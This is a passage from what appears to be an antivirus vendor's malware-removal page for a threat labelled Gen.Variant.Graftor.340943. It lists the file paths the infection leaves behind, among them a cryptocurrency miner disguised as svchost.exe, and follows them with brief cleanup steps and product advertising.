C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\705A76DE71EA2CAEBB8F0907449CE086_C37EB0A02CA707BDA9677EF4ED9290A5 (1 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1480 bytes)
C:\Windows\Temp\TarAA15.tmp (2712 bytes)
C:\Windows\Temp\CabAA14.tmp (48 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\705A76DE71EA2CAEBB8F0907449CE086_C37EB0A02CA707BDA9677EF4ED9290A5 (1464 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\xmrig\svchost.exe (6841 bytes)
%Program Files%\Mysqld\NetSyst96.PNG (118569 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\NetSyst96[1].dll (115321 bytes)
%Program Files%\Microsoft Iphgbn\Iphgbnc.exe (52 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Gen.Variant.Graftor.340943_3834fb5cce

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Gen.Variant.Graftor.340943_3834fb5cce

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet